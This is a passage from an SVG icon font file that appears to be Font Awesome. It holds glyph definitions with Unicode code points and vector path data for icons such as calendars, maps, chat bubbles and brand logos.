t-10 20.5l-46 588l-189 -425q-8 -19 -29 -19h-120q-20 0 -29 19l-188 427l-45 -590q-1 -12 -10 -20.5t-21 -8.5h-135q-13 0 -23 10q-9 10 -9 24l78 961q1 12 10 20.5t21 8.5h142q20 0 29 -19l220 -520q10 -24 20 -51q3 7 9.5 24.5t10.5 26.5l221 520q9 19 29 19h141
q13 0 22 -8.5t10 -20.5z" />
    <glyph glyph-name="_568" unicode="&#xf25d;" horiz-adv-x="1792" 
d="M1042 833q0 88 -60 121q-33 18 -117 18h-123v-281h162q66 0 102 37t36 105zM1094 548l205 -373q8 -17 -1 -31q-8 -16 -27 -16h-152q-20 0 -28 17l-194 365h-155v-350q0 -14 -9 -23t-23 -9h-134q-14 0 -23 9t-9 23v960q0 14 9 23t23 9h294q128 0 190 -24q85 -31 134 -109
t49 -180q0 -92 -42.5 -165.5t-115.5 -109.5q6 -10 9 -16zM896 1376q-150 0 -286 -58.5t-234.5 -157t-157 -234.5t-58.5 -286t58.5 -286t157 -234.5t234.5 -157t286 -58.5t286 58.5t234.5 157t157 234.5t58.5 286t-58.5 286t-157 234.5t-234.5 157t-286 58.5zM1792 640
q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="_569" unicode="&#xf25e;" horiz-adv-x="1792" 
d="M605 303q153 0 257 104q14 18 3 36l-45 82q-6 13 -24 17q-16 2 -27 -11l-4 -3q-4 -4 -11.5 -10t-17.5 -13.5t-23.5 -14.5t-28.5 -13t-33.5 -9.5t-37.5 -3.5q-76 0 -125 50t-49 127q0 76 48 125.5t122 49.5q37 0 71.5 -14t50.5 -28l16 -14q11 -11 26 -10q16 2 24 14l53 78
q13 20 -2 39q-3 4 -11 12t-30 23.5t-48.5 28t-67.5 22.5t-86 10q-148 0 -246 -96.5t-98 -240.5q0 -146 97 -241.5t247 -95.5zM1235 303q153 0 257 104q14 18 4 36l-45 82q-8 14 -25 17q-16 2 -27 -11l-4 -3q-4 -4 -11.5 -10t-17.5 -13.5t-23.5 -14.5t-28.5 -13t-33.5 -9.5
t-37.5 -3.5q-76 0 -125 50t-49 127q0 76 48 125.5t122 49.5q37 0 71.5 -14t50.5 -28l16 -14q11 -11 26 -10q16 2 24 14l53 78q13 20 -2 39q-3 4 -11 12t-30 23.5t-48.5 28t-67.5 22.5t-86 10q-147 0 -245.5 -96.5t-98.5 -240.5q0 -146 97 -241.5t247 -95.5zM896 1376
q-150 0 -286 -58.5t-234.5 -157t-157 -234.5t-58.5 -286t58.5 -286t157 -234.5t234.5 -157t286 -58.5t286 58.5t234.5 157t157 234.5t58.5 286t-58.5 286t-157 234.5t-234.5 157t-286 58.5zM896 1536q182 0 348 -71t286 -191t191 -286t71 -348t-71 -348t-191 -286t-286 -191
t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71z" />
    <glyph glyph-name="f260" unicode="&#xf260;" horiz-adv-x="2048" 
d="M736 736l384 -384l-384 -384l-672 672l672 672l168 -168l-96 -96l-72 72l-480 -480l480 -480l193 193l-289 287zM1312 1312l672 -672l-672 -672l-168 168l96 96l72 -72l480 480l-480 480l-193 -193l289 -287l-96 -96l-384 384z" />
    <glyph glyph-name="f261" unicode="&#xf261;" horiz-adv-x="1792" 
d="M717 182l271 271l-279 279l-88 -88l192 -191l-96 -96l-279 279l279 279l40 -40l87 87l-127 128l-454 -454zM1075 190l454 454l-454 454l-271 -271l279 -279l88 88l-192 191l96 96l279 -279l-279 -279l-40 40l-87 -88zM1792 640q0 -182 -71 -348t-191 -286t-286 -191
t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191t191 -286t71 -348z" />
    <glyph glyph-name="_572" unicode="&#xf262;" horiz-adv-x="2304" 
d="M651 539q0 -39 -27.5 -66.5t-65.5 -27.5q-39 0 -66.5 27.5t-27.5 66.5q0 38 27.5 65.5t66.5 27.5q38 0 65.5 -27.5t27.5 -65.5zM1805 540q0 -39 -27.5 -66.5t-66.5 -27.5t-66.5 27.5t-27.5 66.5t27.5 66t66.5 27t66.5 -27t27.5 -66zM765 539q0 79 -56.5 136t-136.5 57
t-136.5 -56.5t-56.5 -136.5t56.5 -136.5t136.5 -56.5t136.5 56.5t56.5 136.5zM1918 540q0 80 -56.5 136.5t-136.5 56.5q-79 0 -136 -56.5t-57 -136.5t56.5 -136.5t136.5 -56.5t136.5 56.5t56.5 136.5zM850 539q0 -116 -81.5 -197.5t-196.5 -81.5q-116 0 -197.5 82t-81.5 197
t82 196.5t197 81.5t196.5 -81.5t81.5 -196.5zM2004 540q0 -115 -81.5 -196.5t-197.5 -81.5q-115 0 -196.5 81.5t-81.5 196.5t81.5 196.5t196.5 81.5q116 0 197.5 -81.5t81.5 -196.5zM1040 537q0 191 -135.5 326.5t-326.5 135.5q-125 0 -231 -62t-168 -168.5t-62 -231.5
t62 -231.5t168 -168.5t231 -62q191 0 326.5 135.5t135.5 326.5zM1708 1110q-254 111 -556 111q-319 0 -573 -110q117 0 223 -45.5t182.5 -122.5t122 -183t45.5 -223q0 115 43.5 219.5t118 180.5t177.5 123t217 50zM2187 537q0 191 -135 326.5t-326 135.5t-326.5 -135.5
t-135.5 -326.5t135.5 -326.5t326.5 -135.5t326 135.5t135 326.5zM1921 1103h383q-44 -51 -75 -114.5t-40 -114.5q110 -151 110 -337q0 -156 -77 -288t-209 -208.5t-287 -76.5q-133 0 -249 56t-196 155q-47 -56 -129 -179q-11 22 -53.5 82.5t-74.5 97.5
q-80 -99 -196.5 -155.5t-249.5 -56.5q-155 0 -287 76.5t-209 208.5t-77 288q0 186 110 337q-9 51 -40 114.5t-75 114.5h365q149 100 355 156.5t432 56.5q224 0 421 -56t348 -157z" />
    <glyph glyph-name="f263" unicode="&#xf263;" horiz-adv-x="1280" 
d="M640 629q-188 0 -321 133t-133 320q0 188 133 321t321 133t321 -133t133 -321q0 -187 -133 -320t-321 -133zM640 1306q-92 0 -157.5 -65.5t-65.5 -158.5q0 -92 65.5 -157.5t157.5 -65.5t157.5 65.5t65.5 157.5q0 93 -65.5 158.5t-157.5 65.5zM1163 574q13 -27 15 -49.5
t-4.5 -40.5t-26.5 -38.5t-42.5 -37t-61.5 -41.5q-115 -73 -315 -94l73 -72l267 -267q30 -31 30 -74t-30 -73l-12 -13q-31 -30 -74 -30t-74 30q-67 68 -267 268l-267 -268q-31 -30 -74 -30t-73 30l-12 13q-31 30 -31 73t31 74l267 267l72 72q-203 21 -317 94
q-39 25 -61.5 41.5t-42.5 37t-26.5 38.5t-4.5 40.5t15 49.5q10 20 28 35t42 22t56 -2t65 -35q5 -4 15 -11t43 -24.5t69 -30.5t92 -24t113 -11q91 0 174 25.5t120 50.5l38 25q33 26 65 35t56 2t42 -22t28 -35z" />
    <glyph glyph-name="_574" unicode="&#xf264;" 
d="M927 956q0 -66 -46.5 -112.5t-112.5 -46.5t-112.5 46.5t-46.5 112.5t46.5 112.5t112.5 46.5t112.5 -46.5t46.5 -112.5zM1141 593q-10 20 -28 32t-47.5 9.5t-60.5 -27.5q-10 -8 -29 -20t-81 -32t-127 -20t-124 18t-86 36l-27 18q-31 25 -60.5 27.5t-47.5 -9.5t-28 -32
q-22 -45 -2 -74.5t87 -73.5q83 -53 226 -67l-51 -52q-142 -142 -191 -190q-22 -22 -22 -52.5t22 -52.5l9 -9q22 -22 52.5 -22t52.5 22l191 191q114 -115 191 -191q22 -22 52.5 -22t52.5 22l9 9q22 22 22 52.5t-22 52.5l-191 190l-52 52q141 14 225 67q67 44 87 73.5t-2 74.5
zM1092 956q0 134 -95 229t-229 95t-229 -95t-95 -229t95 -229t229 -95t229 95t95 229zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
    <glyph glyph-name="_575" unicode="&#xf265;" horiz-adv-x="1720" 
d="M1565 1408q65 0 110 -45.5t45 -110.5v-519q0 -176 -68 -336t-182.5 -275t-274 -182.5t-334.5 -67.5q-176 0 -335.5 67.5t-274.5 182.5t-183 275t-68 336v519q0 64 46 110t110 46h1409zM861 344q47 0 82 33l404 388q37 35 37 85q0 49 -34.5 83.5t-83.5 34.5q-47 0 -82 -33
l-323 -310l-323 310q-35 33 -81 33q-49 0 -83.5 -34.5t-34.5 -83.5q0 -51 36 -85l405 -388q33 -33 81 -33z" />
    <glyph glyph-name="_576" unicode="&#xf266;" horiz-adv-x="2304" 
d="M1494 -103l-295 695q-25 -49 -158.5 -305.5t-198.5 -389.5q-1 -1 -27.5 -0.5t-26.5 1.5q-82 193 -255.5 587t-259.5 596q-21 50 -66.5 107.5t-103.5 100.5t-102 43q0 5 -0.5 24t-0.5 27h583v-50q-39 -2 -79.5 -16t-66.5 -43t-10 -64q26 -59 216.5 -499t235.5 -540
q31 61 140 266.5t131 247.5q-19 39 -126 281t-136 295q-38 69 -201 71v50l513 -1v-47q-60 -2 -93.5 -25t-12.5 -69q33 -70 87 -189.5t86 -187.5q110 214 173 363q24 55 -10 79.5t-129 26.5q1 7 1 25v24q64 0 170.5 0.5t180 1t92.5 0.5v-49q-62 -2 -119 -33t-90 -81
l-213 -442q13 -33 127.5 -290t121.5 -274l441 1017q-14 38 -49.5 62.5t-65 31.5t-55.5 8v50l460 -4l1 -2l-1 -44q-139 -4 -201 -145q-526 -1216 -559 -1291h-49z" />
    <glyph glyph-name="_577" unicode="&#xf267;" horiz-adv-x="1792" 
d="M949 643q0 -26 -16.5 -45t-41.5 -19q-26 0 -45 16.5t-19 41.5q0 26 17 45t42 19t44 -16.5t19 -41.5zM964 585l350 581q-9 -8 -67.5 -62.5t-125.5 -116.5t-136.5 -127t-117 -110.5t-50.5 -51.5l-349 -580q7 7 67 62t126 116.5t136 127t117 111t50 50.5zM1611 640
q0 -201 -104 -371q-3 2 -17 11t-26.5 16.5t-16.5 7.5q-13 0 -13 -13q0 -10 59 -44q-74 -112 -184.5 -190.5t-241.5 -110.5l-16 67q-1 10 -15 10q-5 0 -8 -5.5t-2 -9.5l16 -68q-72 -15 -146 -15q-199 0 -372 105q1 2 13 20.5t21.5 33.5t9.5 19q0 13 -13 13q-6 0 -17 -14.5
t-22.5 -34.5t-13.5 -23q-113 75 -192 187.5t-110 244.5l69 15q10 3 10 15q0 5 -5.5 8t-10.5 2l-68 -15q-14 72 -14 139q0 206 109 379q2 -1 18.5 -12t30 -19t17.5 -8q13 0 13 12q0 6 -12.5 15.5t-32.5 21.5l-20 12q77 112 189 189t244 107l15 -67q2 -10 15 -10q5 0 8 5.5
t2 10.5l-15 66q71 13 134 13q204 0 379 -109q-39 -56 -39 -65q0 -13 12 -13q11 0 48 64q111 -75 187.5 -186t107.5 -241l-56 -12q-10 -2 -10 -16q0 -5 5.5 -8t9.5 -2l57 13q14 -72 14 -140zM1696 640q0 163 -63.5 311t-170.5 255t-255 170.5t-311 63.5t-311 -63.5
t-255 -170.5t-170.5 -255t-63.5 -311t63.5 -311t170.5 -255t255 -170.5t311 -63.5t311 63.5t255 170.5t170.5 255t63.5 311zM1792 640q0 -182 -71 -348t-191 -286t-286 -191t-348 -71t-348 71t-286 191t-191 286t-71 348t71 348t191 286t286 191t348 71t348 -71t286 -191
t191 -286t71 -348z" />
    <glyph glyph-name="_578" unicode="&#xf268;" horiz-adv-x="1792" 
d="M893 1536q240 2 451 -120q232 -134 352 -372l-742 39q-160 9 -294 -74.5t-185 -229.5l-276 424q128 159 311 245.5t383 87.5zM146 1131l337 -663q72 -143 211 -217t293 -45l-230 -451q-212 33 -385 157.5t-272.5 316t-99.5 411.5q0 267 146 491zM1732 962
q58 -150 59.5 -310.5t-48.5 -306t-153 -272t-246 -209.5q-230 -133 -498 -119l405 623q88 131 82.5 290.5t-106.5 277.5zM896 942q125 0 213.5 -88.5t88.5 -213.5t-88.5 -213.5t-213.5 -88.5t-213.5 88.5t-88.5 213.5t88.5 213.5t213.5 88.5z" />
    <glyph glyph-name="_579" unicode="&#xf269;" horiz-adv-x="1792" 
d="M903 -256q-283 0 -504.5 150.5t-329.5 398.5q-58 131 -67 301t26 332.5t111 312t179 242.5l-11 -281q11 14 68 15.5t70 -15.5q42 81 160.5 138t234.5 59q-54 -45 -119.5 -148.5t-58.5 -163.5q25 -8 62.5 -13.5t63 -7.5t68 -4t50.5 -3q15 -5 9.5 -45.5t-30.5 -75.5
q-5 -7 -16.5 -18.5t-56.5 -35.5t-101 -34l15 -189l-139 67q-18 -43 -7.5 -81.5t36 -66.5t65.5 -41.5t81 -6.5q51 9 98 34.5t83.5 45t73.5 17.5q61 -4 89.5 -33t19.5 -65q-1 -2 -2.5 -5.5t-8.5 -12.5t-18 -15.5t-31.5 -10.5t-46.5 -1q-60 -95 -144.5 -135.5t-209.5 -29.5
q74 -61 162.5 -82.5t168.5 -6t154.5 52t128 87.5t80.5 104q43 91 39 192.5t-37.5 188.5t-78.5 125q87 -38 137 -79.5t77 -112.5q15 170 -57.5 343t-209.5 284q265 -77 412 -279.5t151 -517.5q2 -127 -40.5 -255t-123.5 -238t-189 -196t-247.5 -135.5t-288.5 -49.5z" />
    <glyph glyph-name="_580" unicode="&#xf26a;" horiz-adv-x="1792" 
d="M1493 1308q-165 110 -359 110q-155 0 -293 -73t-240 -200q-75 -93 -119.5 -218t-48.5 -266v-42q4 -141 48.5 -266t119.5 -218q102 -127 240 -200t293 -73q194 0 359 110q-121 -108 -274.5 -168t-322.5 -60q-29 0 -43 1q-175 8 -333 82t-272 193t-181 281t-67 339
q0 182 71 348t191 286t286 191t348 71h3q168 -1 320.5 -60.5t273.5 -167.5zM1792 640q0 -192 -77 -362.5t-213 -296.5q-104 -63 -222 -63q-137 0 -255 84q154 56 253.5 233t99.5 405q0 227 -99 404t-253 234q119 83 254 83q119 0 226 -65q135 -125 210.5 -295t75.5 -361z
" />
    <glyph glyph-name="_581" unicode="&#xf26b;" horiz-adv-x="1792" 
d="M1792 599q0 -56 -7 -104h-1151q0 -146 109.5 -244.5t257.5 -98.5q99 0 185.5 46.5t136.5 130.5h423q-56 -159 -170.5 -281t-267.5 -188.5t-321 -66.5q-187 0 -356 83q-228 -116 -394 -116q-237 0 -237 263q0 115 45 275q17 60 109 229q199 360 475 606
q-184 -79 -427 -354q63 274 283.5 449.5t501.5 175.5q30 0 45 -1q255 117 433 117q64 0 116 -13t94.5 -40.5t66.5 -76.5t24 -115q0 -116 -75 -286q101 -182 101 -390zM1722 1239q0 83 -53 132t-137 49q-108 0 -254 -70q121 -47 222.5 -131.5t170.5 -195.5q51 135 51 216z
M128 2q0 -86 48.5 -132.5t134.5 -46.5q115 0 266 83q-122 72 -213.5 183t-137.5 245q-98 -205 -98 -332zM632 715h728q-5 142 -113 237t-251 95q-144 0 -251.5 -95t-112.5 -237z" />
    <glyph glyph-name="_582" unicode="&#xf26c;" horiz-adv-x="2048" 
d="M1792 288v960q0 13 -9.5 22.5t-22.5 9.5h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-960q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5zM1920 1248v-960q0 -66 -47 -113t-113 -47h-736v-128h352q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23
v64q0 14 9 23t23 9h352v128h-736q-66 0 -113 47t-47 113v960q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
    <glyph glyph-name="_583" unicode="&#xf26d;" horiz-adv-x="1792" 
d="M138 1408h197q-70 -64 -126 -149q-36 -56 -59 -115t-30 -125.5t-8.5 -120t10.5 -132t21 -126t28 -136.5q4 -19 6 -28q51 -238 81 -329q57 -171 152 -275h-272q-48 0 -82 34t-34 82v1304q0 48 34 82t82 34zM1346 1408h308q48 0 82 -34t34 -82v-1304q0 -48 -34 -82t-82 -34
h-178q212 210 196 565l-469 -101q-2 -45 -12 -82t-31 -72t-59.5 -59.5t-93.5 -36.5q-123 -26 -199 40q-32 27 -53 61t-51.5 129t-64.5 258q-35 163 -45.5 263t-5.5 139t23 77q20 41 62.5 73t102.5 45q45 12 83.5 6.5t67 -17t54 -35t43 -48t34.5 -56.5l468 100
q-68 175 -180 287z" />
    <glyph glyph-name="_584" unicode="&#xf26e;" 
d="M1401 -11l-6 -6q-113 -113 -259 -175q-154 -64 -317 -64q-165 0 -317 64q-148 63 -259 175q-113 112 -175 258q-42 103 -54 189q-4 28 48 36q51 8 56 -20q1 -1 1 -4q18 -90 46 -159q50 -124 152 -226q98 -98 226 -152q132 -56 276 -56q143 0 276 56q128 55 225 152l6 6
q10 10 25 6q12 -3 33 -22q36 -37 17 -58zM929 604l-66 -66l63 -63q21 -21 -7 -49q-17 -17 -32 -17q-10 0 -19 10l-62 61l-66 -66q-5 -5 -15 -5q-15 0 -31 16l-2 2q-18 15 -18 29q0 7 8 17l66 65l-66 66q-16 16 14 45q18 18 31 18q6 0 13 -5l65 -66l65 65q18 17 48 -13
q27 -27 11 -44zM1400 547q0 -118 -46 -228q-45 -105 -126 -186q-80 -80 -187 -126t-228 -46t-228 46t-187 126q-82 82 -125 186q-15 33 -15 40h-1q-9 27 43 44q50 16 60 -12q37 -99 97 -167h1v339v2q3 136 102 232q105 103 253 103q147 0 251 -103t104 -249
q0 -147 -104.5 -251t-250.5 -104q-58 0 -112 16q-28 11 -13 61q16 51 44 43l14 -3q14 -3 33 -6t30 -3q104 0 176 71.5t72 174.5q0 101 -72 171q-71 71 -175 71q-107 0 -178 -80q-64 -72 -64 -160v-413q110 -67 242 -67q96 0 185 36.5t156 103.5t103.5 155t36.5 183
q0 198 -141 339q-140 140 -339 140q-200 0 -340 -140q-53 -53 -77 -87l-2 -2q-8 -11 -13 -15.5t-21.5 -9.5t-38.5 3q-21 5 -36.5 16.5t-15.5 26.5v680q0 15 10.5 26.5t27.5 11.5h877q30 0 30 -55t-30 -55h-811v-483h1q40 42 102 84t108 61q109 46 231 46q121 0 228 -46
t187 -126q81 -81 126 -186q46 -112 46 -229zM1369 1128q9 -8 9 -18t-5.5 -18t-16.5 -21q-26 -26 -39 -26q-9 0 -16 7q-106 91 -207 133q-128 56 -276 56q-133 0 -262 -49q-27 -10 -45 37q-9 25 -8 38q3 16 16 20q130 57 299 57q164 0 316 -64q137 -58 235 -152z" />
    <glyph glyph-name="_585" unicode="&#xf270;" horiz-adv-x="1792" 
d="M1551 60q15 6 26 3t11 -17.5t-15 -33.5q-13 -16 -44 -43.5t-95.5 -68t-141 -74t-188 -58t-229.5 -24.5q-119 0 -238 31t-209 76.5t-172.5 104t-132.5 105t-84 87.5q-8 9 -10 16.5t1 12t8 7t11.5 2t11.5 -4.5q192 -117 300 -166q389 -176 799 -90q190 40 391 135z
M1758 175q11 -16 2.5 -69.5t-28.5 -102.5q-34 -83 -85 -124q-17 -14 -26 -9t0 24q21 45 44.5 121.5t6.5 98.5q-5 7 -15.5 11.5t-27 6t-29.5 2.5t-35 0t-31.5 -2t-31 -3t-22.5 -2q-6 -1 -13 -1.5t-11 -1t-8.5 -1t-7 -0.5h-5.5h-4.5t-3 0.5t-2 1.5l-1.5 3q-6 16 47 40t103 30
q46 7 108 1t76 -24zM1364 618q0 -31 13.5 -64t32 -58t37.5 -46t33 -32l13 -11l-227 -224q-40 37 -79 75.5t-58 58.5l-19 20q-11 11 -25 33q-38 -59 -97.5 -102.5t-127.5 -63.5t-140 -23t-137.5 21t-117.5 65.5t-83 113t-31 162.5q0 84 28 154t72 116.5t106.5 83t122.5 57
t130 34.5t119.5 18.5t99.5 6.5v127q0 65 -21 97q-34 53 -121 53q-6 0 -16.5 -1t-40.5 -12t-56 -29.5t-56 -59.5t-48 -96l-294 27q0 60 22 119t67 113t108 95t151.5 65.5t190.5 24.5q100 0 181 -25t129.5 -61.5t81 -83t45 -86t12.5 -73.5v-589zM692 597q0 -86 70 -133
q66 -44 139 -22q84 25 114 123q14 45 14 101v162q-59 -2 -111 -12t-106.5 -33.5t-87 -71t-32.5 -114.5z" />
    <glyph glyph-name="_586" unicode="&#xf271;" horiz-adv-x="1792" 
d="M1536 1280q52 0 90 -38t38 -90v-1280q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h128zM1152 1376v-288q0 -14 9 -23t23 -9
h64q14 0 23 9t9 23v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM384 1376v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23zM1536 -128v1024h-1408v-1024h1408zM896 448h224q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-224
v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-224q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v224q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-224z" />
    <glyph glyph-name="_587" unicode="&#xf272;" horiz-adv-x="1792" 
d="M1152 416v-64q0 -14 -9 -23t-23 -9h-576q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h576q14 0 23 -9t9 -23zM128 -128h1408v1024h-1408v-1024zM512 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1280 1088v288q0 14 -9 23
t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1664 1152v-1280q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47h64q66 0 113 -47
t47 -113v-96h128q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_588" unicode="&#xf273;" horiz-adv-x="1792" 
d="M1111 151l-46 -46q-9 -9 -22 -9t-23 9l-188 189l-188 -189q-10 -9 -23 -9t-22 9l-46 46q-9 9 -9 22t9 23l189 188l-189 188q-9 10 -9 23t9 22l46 46q9 9 22 9t23 -9l188 -188l188 188q10 9 23 9t22 -9l46 -46q9 -9 9 -22t-9 -23l-188 -188l188 -188q9 -10 9 -23t-9 -22z
M128 -128h1408v1024h-1408v-1024zM512 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1280 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1664 1152v-1280
q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_589" unicode="&#xf274;" horiz-adv-x="1792" 
d="M1303 572l-512 -512q-10 -9 -23 -9t-23 9l-288 288q-9 10 -9 23t9 22l46 46q9 9 22 9t23 -9l220 -220l444 444q10 9 23 9t22 -9l46 -46q9 -9 9 -22t-9 -23zM128 -128h1408v1024h-1408v-1024zM512 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23
t23 -9h64q14 0 23 9t9 23zM1280 1088v288q0 14 -9 23t-23 9h-64q-14 0 -23 -9t-9 -23v-288q0 -14 9 -23t23 -9h64q14 0 23 9t9 23zM1664 1152v-1280q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47
t47 -113v-96h384v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
    <glyph glyph-name="_590" unicode="&#xf275;" horiz-adv-x="1792" 
d="M448 1536q26 0 45 -19t19 -45v-891l536 429q17 14 40 14q26 0 45 -19t19 -45v-379l536 429q17 14 40 14q26 0 45 -19t19 -45v-1152q0 -26 -19 -45t-45 -19h-1664q-26 0 -45 19t-19 45v1664q0 26 19 45t45 19h384z" />
    <glyph glyph-name="_591" unicode="&#xf276;" horiz-adv-x="1024" 
d="M512 448q66 0 128 15v-655q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v655q62 -15 128 -15zM512 1536q212 0 362 -150t150 -362t-150 -362t-362 -150t-362 150t-150 362t150 362t362 150zM512 1312q14 0 23 9t9 23t-9 23t-23 9q-146 0 -249 -103t-103 -249
q0 -14 9 -23t23 -9t23 9t9 23q0 119 84.5 203.5t203.5 84.5z" />
    <glyph glyph-name="_592" unicode="&#xf277;" horiz-adv-x="1792" 
d="M1745 1239q10 -10 10 -23t-10 -23l-141 -141q-28 -28 -68 -28h-1344q-26 0 -45 19t-19 45v256q0 26 19 45t45 19h576v64q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-64h512q40 0 68 -28zM768 320h256v-512q0 -26 -19 -45t-45 -19h-128q-26 0 -45 19t-19 45v512zM1600 768
q26 0 45 -19t19 -45v-256q0 -26 -19 -45t-45 -19h-1344q-40 0 -68 28l-141 141q-10 10 -10 23t10 23l141 141q28 28 68 28h512v192h256v-192h576z" />
    <glyph glyph-name="_593" unicode="&#xf278;" horiz-adv-x="2048" 
d="M2020 1525q28 -20 28 -53v-1408q0 -20 -11 -36t-29 -23l-640 -256q-24 -11 -48 0l-616 246l-616 -246q-10 -5 -24 -5q-19 0 -36 11q-28 20 -28 53v1408q0 20 11 36t29 23l640 256q24 11 48 0l616 -246l616 246q32 13 60 -6zM736 1390v-1270l576 -230v1270zM128 1173
v-1270l544 217v1270zM1920 107v1270l-544 -217v-1270z" />
    <glyph glyph-name="_594" unicode="&#xf279;" horiz-adv-x="1792" 
d="M512 1536q13 0 22.5 -9.5t9.5 -22.5v-1472q0 -20 -17 -28l-480 -256q-7 -4 -15 -4q-13 0 -22.5 9.5t-9.5 22.5v1472q0 20 17 28l480 256q7 4 15 4zM1760 1536q13 0 22.5 -9.5t9.5 -22.5v-1472q0 -20 -17 -28l-480 -256q-7 -4 -15 -4q-13 0 -22.5 9.5t-9.5 22.5v1472
q0 20 17 28l480 256q7 4 15 4zM640 1536q8 0 14 -3l512 -256q18 -10 18 -29v-1472q0 -13 -9.5 -22.5t-22.5 -9.5q-8 0 -14 3l-512 256q-18 10 -18 29v1472q0 13 9.5 22.5t22.5 9.5z" />
    <glyph glyph-name="_595" unicode="&#xf27a;" horiz-adv-x="1792" 
d="M640 640q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1024 640q0 53 -37.5 90.5t-90.5 37.5t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1408 640q0 53 -37.5 90.5t-90.5 37.5
t-90.5 -37.5t-37.5 -90.5t37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1792 640q0 -174 -120 -321.5t-326 -233t-450 -85.5q-110 0 -211 18q-173 -173 -435 -229q-52 -10 -86 -13q-12 -1 -22 6t-13 18q-4 15 20 37q5 5 23.5 21.5t25.5 23.5t23.5 25.5t24 31.5t20.5 37
t20 48t14.5 57.5t12.5 72.5q-146 90 -229.5 216.5t-83.5 269.5q0 174 120 321.5t326 233t450 85.5t450 -85.5t326 -233t120 -321.5z" />
    <glyph glyph-name="_596" unicode="&#xf27b;" horiz-adv-x="1792" 
d="M640 640q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1024 640q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1408 640q0 -53 -37.5 -90.5t-90.5 -37.5
t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM896 1152q-204 0 -381.5 -69.5t-282 -187.5t-104.5 -255q0 -112 71.5 -213.5t201.5 -175.5l87 -50l-27 -96q-24 -91 -70 -172q152 63 275 171l43 38l57 -6q69 -8 130 -8q204 0 381.5 69.5t282 187.5
t104.5 255t-104.5 255t-282 187.5t-381.5 69.5zM1792 640q0 -174 -120 -321.5t-326 -233t-450 -85.5q-70 0 -145 8q-198 -175 -460 -242q-49 -14 -114 -22h-5q-15 0 -27 10.5t-16 27.5v1q-3 4 -0.5 12t2 10t4.5 9.5l6 9t7 8.5t8 9q7 8 31 34.5t34.5 38t31 39.5t32.5 51
t27 59t26 76q-157 89 -247.5 220t-90.5 281q0 130 71 248.5t191 204.5t286 136.5t348 50.5t348 -50.5t286 -136.5t191 -204.5t71 -248.5z" />
    <glyph glyph-name="_597" unicode="&#xf27c;" horiz-adv-x="1024" 
d="M512 345l512 295v-591l-512 -296v592zM0 640v-591l512 296zM512 1527v-591l-512 -296v591zM512 936l512 295v-591z" />
    <glyph glyph-name="_598" unicode="&#xf27d;" horiz-adv-x="1792" 
d="M1709 1018q-10 -236 -332 -651q-333 -431 -562 -431q-142 0 -240 263q-44 160 -132 482q-72 262 -157 262q-18 0 -127 -76l-77 98q24 21 108 96.5t130 115.5q156 138 241 146q95 9 153 -55.5t81 -203.5q44 -287 66 -373q55 -249 120 -249q51 0 154 161q101 161 109 246
